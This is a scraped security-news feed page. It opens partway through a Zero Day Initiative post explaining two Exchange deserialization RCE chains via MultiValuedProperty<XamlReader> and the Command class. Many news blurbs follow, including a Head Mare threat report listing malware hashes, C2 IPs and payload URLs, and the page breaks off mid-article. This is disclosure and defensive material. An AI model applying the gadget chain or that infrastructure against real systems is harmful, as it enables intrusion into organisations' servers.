the RCE part of the ProxyNotShell chain, was fixed with the introduction of the Microsoft.Exchange.Diagnostics.UnitySerializationHolderSurrogateSelector class. It extends SurrogateSelector and its main goal is to validate the types that are retrieved during the deserialization of UnitySerializationHolder. It does this by checking the types against an allow list. Microsoft’s approach here seems appropriate. An allow list is probably the best way to fight deserialization issues and similar type-based vulnerabilities. However, when the allow list is extensive, it may be possible to find some types there that can be used in exploitation. I decided to take this path and look for potentially dangerous allowed classes. ZDI-23-162/ CVE-2023-21529 – Allowed MultiValuedProperty Leads to RCE The Exchange allow lists can be divided into two main parts:• List of allowed regular types.• List of allowed generic types. Generic types seem especially interesting because they allow the inclusion of arbitrary, internal types. Moreover, generic types can be also retrieved through a deserialization of UnitySerializationHolder. Let’s review the list of allowed generics that are defined in the Microsoft.Exchange.Data.SerializationTypeConverter.allowedGenerics member. The first part of the list is especially interesting because it contains custom Exchange types. It turns out that deserialization involving retrieval of the Microsoft.Exchange.Data.MultiValuedProperty<T> or Microsoft.Exchange.Data.DagNetMultiValuedProperty<T> generic classes can lead to remote code execution. One may remember that PowerShell Remoting deserialization allows one to call a single-argument constructor of any allowed type (as long as the argument can be also deserialized). This leads us to a consider a single-argument constructor of MultiValuedProperty<T>. As you can see, it accepts an argument of type object. Thus, the attacker can provide an instance of any allowed PowerShell Remoting deserializable class. This constructor invokes a different constructor that accepts a larger number of arguments. A great deal of processing occurs after the constructor call. Of primary interest is that we ultimately reach the ValueConvertor.ConvertValue method. Here, the attacker-controlled type is provided as the second argument, while the attacker-controlled object is provided as the first argument. This is the object provided to the MultiValuedProperty constructor. At [1], it invokes ValueConvertor.TryParseConversion. This call looks particularly interesting because the method name suggests that the Parse method is involved. At [2], it calls TryConstructorConversion. Let’s focus on the parse-based conversion now. At this stage, it is worth to note the values of specific arguments: • originalValue - value provided by the attacker to the MultiValuedProperty constructor.• originalType - type of the originalValue.• resultType - the type parameter (“T”) of the attacker-specified generic MultiValuedProperty<T> type. At [1], the method checks if originalType is the type string At [2], it calls ConvertValueFromString. This method is also called during the deserialization process. This method hardcodes several possible conversions and throws NotImplementedException if the conversion from originalType to resultType is not implemented. At [3], it catches the exception. At [4], it retrieves the public static Parse method from the attacker-controlled resultType. At [5], it invokes the Parse method with the attacker-specified value. To summarize, the MultiValuedProperty<T> generic class implements another way to call the Parse method. This can result in invocation of the XamlReader.Parse(String) method with an attacker-controlled string. In addition, TryConstructorConversion allows one to call a single-argument constructor of a given class. At this point, one can see that MultiValuedProperty<T> class implements the two most powerful conversions of PowerShell Remoting. Since it is an internal deserialization mechanism, it is included on the allow list. It can be abused by the attacker, for example to call a single-argument constructor of any accessible class. This became a fundamental building block for my subsequent vulnerability research. As an example of how MultiValuedProperty<T> can be abused, consider the following code: This line simulates what we achieve via Exchange PowerShell Remoting during exploitation: • The attacker provides a serialized UnitySerializationHolder object that specifies the allowed MultiValuedProperty<T> type. The type parameter, T, is set to System.Windows.Markup.XamlReader.• An allow list check is performed on our type: MultiValuedProperty<XamlReader>. The check is successful, because: (1) MultiValuedProperty<T> is present on the allow list, and (2) the type specified in the type parameter, XamlReader, is not subjected to validation at all.• The MultiValuedProperty constructor instantiates a XamlReader object by calling the static XamlReader.Parse(String) method.• As the attacker controls the input string, they can provide any XAML deserialization gadget to achieve remote code execution. The simplified attack scheme is presented in the following diagram. As we have shown, allow lists are not always secure, and they need to be carefully reviewed. It may turn out that even in a product as mature as Microsoft Exchange, allowed classes may contain functionality that can be abused. This may be especially true for generic classes included in the allow list. The generic (internal) type should always be verified by your type control mechanism. Otherwise, your allowed class may turn out to be abusable. Moreover, class inheritance should also be verified. For example, suppose that Microsoft removed MultiValuedProperty<T> from the allow list. We would still be able to reach it via the allowed type DagNetMultiValuedProperty<T>: DagNetMultiValuedProperty<T> inherits from MultiValuedProperty<T>. Its single-argument constructor calls the constructor of the base class. Thus, it is another way to trigger the dangerous routine, and it could be abused even if MultiValuedProperty<T> were removed from the allow list. ZDI-23-881/ CVE-2023-32031 – Bypassing the Internal Deny List with the Command Class In CVE-2023-21529, I abused the internal deserialization-like mechanism that can be reached through the allow-listed MultiValuedProperty<T> class. When considering potential patches, two approaches present themselves: Remove MultiValuedProperty<T> from the allow list. Implement additional type control in the internal deserialization mechanism within MultiValuedProperty. MultiValuedProperty is frequently used by the Exchange, thus removing it from an allow list is not an option. Implementing type control in the internal deserialization mechanism defined in ValueConvertor.ConvertValue looks like a good option though. This is what the patch looks like: You can see that the ChainedSerializationBinder.ValidateResultType method was introduced, to limit the types that the attacker can specify. Consequently, if the attacker provides the type MultiValuedProperty<XamlReader>, an exception is being thrown, because type XamlReader fails the new validation. Looking deeper into the validation mechanism, though, I found that type validation here is based on a deny list. Instead of implementing a allow list of types that can be used with the MultiValuedProperty, a deny list was used. If you have seen my Hexacon talk about .NET deserialization, you probably know that I love messing with deny lists. The Exchange deny list is actually pretty good, and it contains dozens of classes. However, it contains almost no internal Exchange classes. My idea was to look for a class, that: • Is not on the deny list.• Implements a public and static Parse(String) method that leads to something exploitable, or• Implements a public constructor that accepts a single argument and leads to something exploitable. Such a class could be abused when chained with MultiValuedProperty internal deserialization. The constructor-based deserialization is handled by the previously mentioned TryConstructorConversion method, and it is pretty much the same as the one implemented in PowerShell Remoting. It didn’t take me long to find the Microsoft.Diagnostics.Runtime.Utilities.Command class: At [1], the Command(String) constructor calls the Command(String, CommandOptions) constructor. At [2], a new ProcessStartInfo is instantiated, and both the process name and arguments are retrieved from the attacker''s controlled input. At [3], Process.StartInfo is set to the ProcessStartInfo object from line [2]. At [4], a new process is started. This class was not included in the deny list, so the following code: Leads to the execution of cmd.exe /c calc.exe. That’s it. To sum this up, I did the following: • I used the allow-listed MultiValuedProperty class to reach the internal deserialization mechanism. This mechanism is protected with the deny list of abusable types.• I delivered the Command class, which is not on the deny list. This allows execution of an arbitrary command. Demo I presented the demo for CVE-2023-32031 during my Hexacon 2023 talk about .NET deserialization. It shows the entire exploitation process with the debugger attached. SummaryIn this blog post, I have described both CVE-2023-21529 and CVE-2023-32031. In those vulnerabilities, I abused both the allow-listed and deny-listed classes to achieve RCE on Exchange. That wasn’t the end of my Exchange vulnerability research, though. I still had two additional full-RCE chains that I was able to deliver after the CVE-2023-32031 patch.In the next blog post, I will provide you with full details on the ZDI-23-1419/CVE-2023-36756 RCE vulnerability. Once again, you can watch my entire OffensiveCon 2024 talk here. Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

Criminals are impersonating MyLowesLife, Lowes'' HR portal for current and former employees.

by Malwarebytes Labs

Industrials, consumer cyclicals, and healthcare sectors remain primary targets, with North America bearing the brunt of attacks.

by ITPro Today

Intermountain Planned Parenthood of Montana suffered a cyberattack which has been claimed by a ransomware group

by Malwarebytes Labs

A new attack runs slow and steady, focused on compromising large manufacturing companies using contextual social engineering to trick victims into giving up credentials.

by KnowBe4

Phishing remains a top initial access vector for threat actors, according to researchers at ReliaQuest. Phishing and other social engineering tactics can bypass security technologies by targeting humans directly.

by KnowBe4

It is no surprise that growing your social network can help get your name out there and provide opportunities to advance your career. LinkedIn, one of the original career-focused networking […] The post How to Put Yourself Out There – Networking on Social Media appeared first on Black Hills Information Security.

by Black Hills Information Security

by Gerald Auger of Simply Cyber // Guest Author You want to break into cybersecurity? That’s AWESOME. I’ve been in the field for 20 years and I LOVE IT! But […] The post How to Get a Job in Cybersecurity appeared first on Black Hills Information Security.

by Black Hills Information Security

Microchip Technology Inc., a leading semiconductor manufacturer, disclosed a data breach following a cyberattack that compromised its IT infrastructure. The attack, claimed by the Play ransomware group, forced the company to partially shut down operations while it worked to restore critical systems. In an SEC filing dated September 4, 2024, the company reported that the … The post Microchip Confirms Data Breach as Play Ransomware Leaks Stolen Docs appeared first on CyberInsider.

by Cyber Insider

A new survey examining public sentiment towards global IT and software providers in the aftermath of the July 2024 CrowdStrike IT outages reveals over three-quarters of people in the UK now worry about the heavy reliance of global organisations on IT systems and software providers.  The research was conducted by OnePoll, on behalf of International […] The post UK Public Worried About Global Over Reliance on IT Systems appeared first on IT Security Guru.

by IT Security Guru

It’s been a decade since the National Institute of Standards and Technology (NIST) introduced its Cybersecurity Framework (CSF) 1.0. Created following a 2013 Executive Order, NIST was tasked with designing a voluntary cybersecurity framework that would help organizations manage cyber risk, providing guidance based on established standards and best practices. While this version was originally

by The Hacker News

In today’s digital retail landscape, PCI DSS compliance is not just a regulatory requirement—it’s a critical business imperative. As a seasoned QSA and security consultant with over two and half decades of experience, I’ve witnessed firsthand the devastating impact of data breaches on businesses. Did you know that 60% of small businesses close within six...

by RH-ISAC

Key takeaways  The Head Mare hacktivist group targets Russian and Belarusian organizations, linking their cyberattacks to geopolitical tensions with Ukraine.  Head Mare''s attacks on Russia and Belarus are strategic, aiming to influence political and economic stability in these countries and support its own objectives.  The group uses sophisticated phishing and ransomware attacks, exploiting vulnerabilities like CVE-2023-38831 in WinRAR and ransomware strains like LockBit and Babuk.  Head Mare’s cyber operations align with the Russo-Ukrainian conflict, applying pressure on Russia and Belarus to distract from Ukraine''s military actions.  The group employs advanced techniques for persistence and evasion, disguising malware and using sophisticated tools to control compromised systems.  Head Mare uses the Sliver framework to manage compromised systems, ensuring their command-and-control infrastructure is resilient.  Tools like Mimikatz are used to extract credentials, enhancing their control over targeted networks.  Overview  The Head Mare hacktivist group has emerged as a formidable digital adversary in today’s geopolitical conflicts. First reported in 2023 on X (previously Twitter), Head Mare has targeted Russian and Belarusian organizations. The group’s actions are not merely technical intrusions but are deeply entwined with the broader political tensions between these countries and their neighbors, particularly in the context of the ongoing Russo-Ukrainian conflict.  Head Mare''s focus on Russian and Belarusian entities is a strategic choice rather than a coincidence. By targeting organizations within these nations, Head Mare aligns its cyber operations with the geopolitical friction between Russia, Belarus, and Ukraine. This approach reflects a deliberate attempt to influence the political and economic stability of these countries through cyber means, thus amplifying the existing geopolitical tensions.  The group''s operations include deploying sophisticated phishing campaigns and ransomware attacks. By exploiting vulnerabilities like CVE-2023-38831 in WinRAR and utilizing ransomware strains such as LockBit and Babuk, Head Mare aims to destabilize key organizations within Russia and Belarus.   The Geopolitical Angle of Head Mare’s Activities  The geopolitical implications of Head Mare’s activities are evident in their choice of targets and methods. By focusing on Russian and Belarusian organizations, Head Mare is engaging in a form of cyber warfare that complements the broader Russo-Ukrainian conflict. The group''s attacks are likely intended to support Ukraine''s strategic objectives by applying additional pressure on Russia and Belarus.  The Russian military''s struggles, especially following Ukraine’s recent offensive into Kursk, have heightened the need for strategic distractions. President Vladimir Putin has used Belarus to create a diversion, hoping that the buildup of Belarusian troops near the Ukrainian border would draw Ukrainian forces away from their offensive operations. Head Mare''s attacks fit into this geopolitical maneuvering by amplifying the pressure on Russia and Belarus.  The situation on the ground further illustrates the intertwining of cyber operations and geopolitical strategy. In August, Belarusian President Alyaksandr Lukashenka announced the deployment of a significant portion of Belarus''s army to the Ukrainian border, citing concerns over a potential Ukrainian offensive. Lukashenka claimed this move was a response to a perceived build-up of Ukrainian troops, which he attributed to a misunderstanding of Belarus’s preparations for Independence Day celebrations.  Despite the official narrative, Lukashenka’s actions are likely influenced by Moscow’s broader strategy. The Belarusian leader’s military deployment aligns with Putin’s attempt to create a strategic diversion. However, Belarus''s involvement in the conflict remains complex.   Lukashenka’s regime is heavily dependent on Russian support, yet Belarusian society shows limited enthusiasm for direct involvement in the war against Ukraine. This lack of domestic support, combined with Lukashenka''s precarious political position, suggests that a full-scale Belarusian invasion of Ukraine remains unlikely.  Technical Sophistication and Strategic Intent  Head Mare''s cyber tactics reflect both technical sophistication and strategic intent. The group employs advanced phishing techniques to exploit vulnerabilities in widely used software, such as WinRAR. By deploying multiple malware types, Head Mare establishes a foothold in targeted systems, enabling further attacks and data collection.  Persistence techniques are another hallmark of Head Mare’s operations. By adding malware samples to the Windows Run registry key or creating scheduled tasks, the group ensures that their malware remains active and continues to transmit data to their command-and-control servers. These methods not only enhance the group’s operational longevity but also contribute to the ongoing disruption.  Detection evasion is a critical component of Head Mare’s strategy. The group disguises its malware as legitimate software, using deceptive filenames to bypass traditional security measures. This approach allows them to maintain a low profile while exerting a significant influence over compromised systems.  Command and Control Infrastructure and Credential Theft  Head Mare utilizes the Sliver framework for managing compromised systems, demonstrating a high level of sophistication in its cyber operations. Sliver enables the group to execute commands, manage connections, and navigate network restrictions effectively. By disguising its Sliver implants and using VPS/VDS servers, Head Mare ensures that its command-and-control infrastructure remains resilient and challenging to dismantle.  Credential theft is another crucial aspect of Head Mare’s strategy. Tools like Mimikatz and XenArmor All-In-One Password Recovery Pro3 facilitate the extraction of credentials from compromised systems. This capability allows Head Mare to escalate their access and maintain control over targeted networks, amplifying their disruptive impact.  Head Mare’s use of ransomware, including LockBit and Babuk, highlights their intent to cause maximum disruption. LockBit targets Windows systems, while Babuk is designed for ESXi servers. The encryption of files and the demand for ransoms serve both financial and operational purposes. By employing multiple ransomware variants and encrypting files twice, Head Mare increases the complexity of recovery and intensifies the pressure on victims to comply with their demands.  Conclusion  Head Mare’s cyber operations illustrate the evolving nature of cyber threats and their intersection with geopolitics. By targeting organizations in Russia and Belarus with sophisticated phishing and ransomware attacks, the group leverages its technical capabilities to influence political outcomes and create disruption.   Head Mare’s operations are a reflection of the broader geopolitical dynamics at play, with their cyber tactics serving as a means to exert political pressure and shape public perceptions. As the conflict between Russia and Ukraine continues to unfold, the role of cyber actors like Head Mare will likely remain an influential factor in international relations and security.  Recommendations and Mitigation  To counteract the threats posed by Head Mare and similar actors, organizations should implement the following best practices:  Continuously scan for vulnerabilities and apply patches promptly to mitigate the risk of exploitation.  Maintain encrypted backups in isolated locations to safeguard against ransomware attacks.  Use EDR solutions to detect and respond to malicious activities in real time.  Educate employees on recognizing and avoiding phishing attempts and other cyber threats.  Keep systems and software up to date with the latest security patches to reduce vulnerabilities.  Indicators of Compromise (IOCs)  Indicator   Type of Indicator   Comments   201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8   SHA-256   NA   9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69   SHA-256   NA   08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470   SHA-256   NA   6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263   SHA-256   NA   33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A   SHA-256   NA   5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03   SHA-256   NA   9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0   SHA-256   NA   5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9   SHA-256   NA   DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA   SHA-256   NA   053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD   SHA-256   NA   2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921   SHA-256   NA   015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343   SHA-256   NA   9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546   SHA-256   NA   22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3   SHA-256   NA   2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569   SHA-256   NA   AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F   SHA-256   NA   9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836   SHA-256   NA   B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984   SHA-256   NA   92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50   SHA-256   NA   664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38   SHA-256   NA   311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86   SHA-256   NA   4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271   SHA-256   NA   2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50   SHA-256   NA   DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E   SHA-256   NA   EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B   SHA-256   NA   188.127.237[.]46   IP   NA   45.87.246[.]169   IP   NA   45.87.245[.]30   IP   NA   185.80.91[.]107   IP   NA   188.127.227[.]201   IP   NA   5.252.176[.]47   IP   NA   45.11.27[.]232   IP   NA   188.127.237[.]46/winlog.exe   URL   NA   188.127.237[.]46/servicedll.exe   URL   NA   194.87.210[.]134/gringo/splhost.exe   URL   NA   194.87.210[.]134/gringo/srvhost.exe   URL   NA   94.131.113[.]79/splhost.exe   URL   NA   94.131.113[.]79/resolver.exe   URL   NA   45.156.21[.]178/dlldriver.exe   URL   NA   5.252.176[.]77/ngrok.exe   URL   NA   5.252.176[.]77/sherlock.ps1   URL   NA   5.252.176[.]77/sysm.elf   URL   NA   5.252.176[.]77/servicedll.rar   URL   NA   5.252.176[.]77/reverse.exe   URL   NA   5.252.176[.]77/soft_knitting.exe   URL   NA   5.252.176[.]77/legislative_cousin.exe   URL   NA   5.252.176[.]77/2000×2000.php   URL   NA   Sources:   https://jamestown.org/program/developments-on-belarus-ukraine-border-prompt-roller-coaster-of-reactions-in-minsk/  https://kyivindependent.com/belarus-moved-third-of-its-army-to-ukraine-border-due-to-independence-day-celebration-mixup-lukashenko-claims/  https://www.atlanticcouncil.org/blogs/ukrainealert/putin-hopes-belarus-border-bluff-can-disrupt-ukraines-invasion-of-russia/  https://www.aljazeera.com/news/2024/8/18/belarus-says-ukraine-amassing-troops-at-border-amid-incursion-into-russia  The post The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis  appeared first on Cyble.

by CYBLE

According to a Salesforce study, 87% of C-suite executives say implementing AI technology is a top business priority, but 93% acknowledge barriers to adoption in their organizations.

by ZDNET Security

OpenAI’s search tool shows promise but lacks Google’s specialized functions and can suffer from hallucinations.

by ITPro Today

To fully realize the benefits trust anchors provide, organizations need to implement processes and technologies that maintain the privacy and security of trust anchors and the personal data they contain.

by Dark Reading

The United States and its allies have linked a group of Russian hackers (tracked as Cadet Blizzard and Ember Bear) behind global critical infrastructure attacks to Unit 29155 of Russia''s Main Directorate of the General Staff of the Armed Forces (also known as GRU). [...]

by BleepingComputer

A critical vulnerability (CVE-2024-20017) affecting MediaTek chipsets widely used in Wi-Fi 6 (802.11ax) devices has gained heightened attention following the publication of a proof-of-concept (PoC) exploit. The flaw, which received a CVSS score of 9.8, poses a severe security risk by allowing remote code execution (RCE) without any user interaction. The PoC was released by … The post MediaTek Chip Flaw Exposing Millions of Devices Gets Public Exploit appeared first on CyberInsider.

by Cyber Insider

The Chinese-speaking threat actor Earth Lusca used the new backdoor KTLVdoor in an attack against a trading company in China. Trend Micro Researchers spotted the Chinese-speaking threat actor Earth Lusca using a new multiplatform backdoor called KTLVdoor. The Earth Lusca group has been active since at least the first half of 2023, it primarily targeted […]

by Security Affairs

Threat actors are likely employing a tool designated for red teaming exercises to serve malware, according to new findings from Cisco Talos. The program in question is a payload generation framework called MacroPack, which is used to generate Office documents, Visual Basic scripts, Windows shortcuts, and other formats for penetration testing and social engineering assessments. It was developed

by The Hacker News

A critical account takeover vulnerability in the LiteSpeed Cache plugin, affecting over 6 million WordPress sites, was patched yesterday with the release of version 6.5.0.1. The vulnerability allows unauthenticated users to take over logged-in accounts, including those with administrator privileges, by exploiting a debug log flaw. Security researcher Rafie Muhammad from Patchstack uncovered the issue … The post LiteSpeed Cache Flaw Exposes 6 Million WordPress Sites to Admin Takeover appeared first on CyberInsider.

by Cyber Insider

Boston, MA, 5th September 2024, CyberNewsWire

by Hackread

The gender gap in cybersecurity isn’t a new issue. The lack of women in cybersecurity and IT has been making headlines for years — even decades. While progress has been made, there is still significant work to do, especially regarding salary. The recent  ISC2 Cybersecurity Workforce Study highlighted numerous cybersecurity issues regarding women in the […] The post New report shows ongoing gender pay gap in cybersecurity appeared first on Security Intelligence.

by Security Intelligence

Yet, another critical severity vulnerability has been discovered in LiteSpeed Cache, a caching plugin for speeding up user browsing in over 6 million WordPress sites. [...]

by BleepingComputer

Episode 362 looks at X’s recent ban, voice-over theft and Apple’s big App store conundrum.

by Kaspersky

After a decline in interest, serverless computing is resurging, positioning it as a key technology for modern cloud-native development.

by ITPro Today

North Carolina musician Michael Smith was indicted for collecting over $10 million in royalty payments from Spotify, Amazon Music, Apple Music, and YouTube Music using AI-generated songs streamed by thousands of bots in a massive streaming fraud scheme. [...]

by BleepingComputer

As AI and ML revolutionize healthcare, concerns over data privacy and HIPAA compliance underscore the need for stringent security measures and ethical data handling practices.

by ITPro Today

OnlyFans account hackers are finding themselves on the receiving end of a nasty cyber surprise.

by Hackread

Microclouds combine cloud convenience with edge infrastructure, offering preconfigured server clusters for easy deployment anywhere, but their future impact on cloud computing remains uncertain.

by ITPro Today

August 2024 again saw an uptick in the number of vulnerability disclosures, with several commonly exploited Common Vulnerabilities and Exposures (CVEs) across several platforms. Risk levels may be high, particularly on an enterprise scale, but the number of exploits seen this month demonstrates that there are active attempts to prevent them. This was another month […] The post Peek into Monthly Vulnerabilities: August 2024 appeared first on ThreatMon Blog.

by ThreatMon

The chipmaker said an unidentified attacker stole employee contact information and some encrypted and hashed passwords.

by Cybersecurity Dive

It’s fair to say cyber security has a bad reputation. It’s portrayed as an industry full of stress, where sleepless nights are a prerequisite, and defenders have the weight of the world on their shoulders, while a world of adversaries work determinedly against them. As a frontline defender within the NHS, I can’t dispute some […] The post Championing the Wins to Improve Wellbeing in the Cyber Workplace appeared first on IT Security Guru.

by IT Security Guru

by ComputerWeekly

Mobile app developers committed to upholding the highest security standards are faced with several considerations when developing and maintaining banking apps. Learn more. The post Safeguarding Financial Data: Essential Cybersecurity Practices for Mobile Banking appeared first on Zimperium.

by Zimperium

National Cyber Director Harry Coker Jr. unveiled the program as part of an effort to fill a continued gap in cyber, technology and AI positions.

by Cybersecurity Dive

The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China. The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems. ""KTLVdoor is a highly obfuscated malware that

by The Hacker News

Using special software, WIRED investigated police surveillance at the DNC. We collected signals from nearly 300,000 devices, revealing vulnerabilities for both law enforcement and everyday citizens alike.

by WIRED Security News

Veeam has released security updates for several of its products as part of a single September 2024 security bulletin that addresses 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. [...]

by BleepingComputer

Cisco has released security updates for two critical security flaws impacting its Smart Licensing Utility that could allow unauthenticated, remote attackers to elevate their privileges or access sensitive information. A brief description of the two vulnerabilities is below - CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account

by The Hacker News

A cyber attack hit the German air traffic control agency (DFS) disrupting its operations, experts attribute it to Russia-linked group APT28. A cyber attack targeted the German Air Traffic Control Agency (DFS), as reported by Spiegel and European Truth. DFS, based in Langen near Frankfurt, confirmed that attackers breached its office connection but confirmed that […]

by Security Affairs

by ComputerWeekly

New rules to inform investors about cybersecurity attacks on public companies.

by Sophos News

Quishing is a type of phishing attack where crooks use QR codes to trick users into providing sensitive information or downloading malware. In recent years, the spread of electric cars has led to an increase in public charging stations. However, new cyber threats have emerged with this growth, including “quishing.” This term, a combination of […]

by Security Affairs

Researchers from the Ben-Gurion University of the Negev have uncovered a method to leak sensitive data from air-gapped systems, introducing a novel attack technique known as RAMBO (RAM-based electromagnetic covert channel). The attack exploits the electromagnetic emissions generated by a computer''s RAM, allowing attackers to exfiltrate information like encryption keys, passwords, biometric data, and files. … The post Novel RAMBO Side-Channel Attack Leaks Data Through RAM Radio Waves appeared first on CyberInsider.

by Cyber Insider

Kaspersky experts found a new variant of the China Chopper web shell from the Tropic Trooper group that imitates an Umbraco CMS module and targets a government entity in the Middle East.

by Securelist

Cloudflare brings visibility to the practice of connection tampering as observed from our global network.

by Cloudflare

New TCP resets and timeouts dataset on Cloudflare Radar surfaces connection tampering, scanning, DoS attacks, and more.

by Cloudflare

The continuation of annual double-digit growth rates, 15% next year, comes as organizations consolidate spending and reassess EPP and EDR needs.

by Cybersecurity Dive

Hackers are targeting other hackers with a fake OnlyFans tool that claims to help steal accounts but instead infects threat actors with the Lumma stealer information-stealing malware. [...]

by BleepingComputer

For three years now, more than a thousand social media accounts have been reposting the same pro-India, anti-Pakistan content on Facebook and X.

by Dark Reading

Multiple studies show that artificial intelligence (AI) is expected to increase revenues and profits for Managed Service Providers (MSPs). However, they also show that AI-enhanced security is struggling to keep up with AI-enhanced attacks.

by Barracuda

Intellexa’s Predator spyware infrastructure re-emerges after sanctions. Learn how this mercenary spyware is evolving, targeting high-profile individuals, and what defensive measures can be taken.

by Recorded Future

This vulnerability allows local attackers to escalate privileges on affected installations of Malwarebytes Antimalware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2024-6260.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39463.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DIAScreen. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-7502.

by Zero Day Initiative Advisories

JFrog''s cybersecurity researchers have identified a new PyPI attack technique called ""Revival Hijack,"" which exploits package deletion policies. Over 22,000 packages are at risk, potentially impacting thousands of users. Stay informed!

by Hackread

To deal with today’s complex and constantly evolving threat landscape and an expanding attack surface, organizations have added a wide range of cybersecurity solutions as they try to improve their security posture and protect their networks, applications, and data.

by Barracuda

The White House Office of the National Cyber Director released a plan outlining steps network operators and service providers need to take to secure BGP from abuse and configuration errors.

by Dark Reading

North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview. The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for

by The Hacker News

Adversaries reusing abandoned package names sneak malware into organizations in a sort of software shell game.

by Dark Reading

Cisco has issued a critical security advisory for its Smart Licensing Utility, highlighting two severe vulnerabilities that could allow remote attackers to gain control of systems or access sensitive data without authentication. The vulnerabilities, identified as CVE-2024-20439 and CVE-2024-20440, received a critical CVSS score of 9.8. Both flaws stem from improper credential handling and excessive … The post Cisco Warns of Severe Vulnerabilities in Licensing Tool appeared first on CyberInsider.

by Cyber Insider

Yubico has disclosed a security vulnerability affecting certain YubiKey and YubiHSM devices, which rely on Infineon''s cryptographic library. This flaw allows sophisticated attackers with physical access to potentially recover private keys used in cryptographic operations. While the vulnerability is significant, it affects only older firmware versions, and Yubico has since removed the flawed library from … The post Yubico Discloses Unfixable Cryptographic Flaw on Some YubiKeys appeared first on CyberInsider.

by Cyber Insider

The hiring effort comes after X, formerly known as Twitter, laid off 80% of its trust and safety staff since Musk''s takeover. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Google has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component. According to the description of the bug in the NIST National

by The Hacker News

As enterprises increasingly adopt large language models, security concerns are shifting from traditional LLM Firewalls to more advanced LLM Threat Detection and Response.

by ITPro Today

Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both? HackerOne Wed, 09/04/2024 - 11:38 Body HackerOne customers consistently factor in cost savings when measuring the success of their security engagements, with 59% valuing the estimated savings of reputational or customer-related incidents and 54% valuing the financial savings estimated from avoiding risk. However, quantifying the ROI for security control testing can be challenging due to the intangible nature of cybersecurity benefits. How do you measure the value of preventing something from happening?Supplementing ROI With ROMTraditional ROI calculations often fall short in capturing the full value of security investments. Gaining traction as an alternative, and in most cases, complementary, assessment mechanism is Return on Mitigation (ROM), which compares the anticipated costs of a security breach with the costs of implementing mitigation strategies. It provides a more nuanced understanding of the qualitative and quantitative benefits of proactive security measures. ROM factors in various potential costs, including:Restoring compromised systemsLost revenue due to downtimeLegal and regulatory penaltiesDamage to public trust and reputationBy assessing the effectiveness of mitigation or prevention strategies in terms of potential financial consequences, ROM offers a practical framework for stakeholders to evaluate the tangible and intangible value of security investments. It also shifts the focus from immediate cost savings to long-term resilience, with a magnifying glass on risk management.“The bug bounty program is the highest ROI across all of our spend. It’s really hard to show ROI, but with bug bounty, I have a baseline. I can say, ‘This vulnerability was able to be found by someone outside the organization. Someone that was not authorized to access this system was able to access it.’ Even with vulnerabilities that are not within our program, bug bounty allows me to put a price tag on them. I can explain this business case and our stakeholders are able to prioritize bug bounty higher than other tools that also generate ROI.”— Eric Kieling, Head of Application Security, Booking.comROI and ROM CalculationsTo illustrate the practical benefits of human-powered security testing and calculations of ROI and ROM, consider a case study from the financial services sector. A major financial institution implemented a bug bounty program alongside its existing red teaming efforts. Over the course of a year, the program identified several critical vulnerabilities that had been overlooked by previous tests.ScenarioInitial security investment: The institution 